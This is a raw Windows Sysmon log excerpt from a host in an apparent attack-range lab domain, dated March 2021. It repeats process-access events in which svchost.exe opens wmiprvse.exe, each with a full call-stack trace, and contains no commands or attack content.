12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 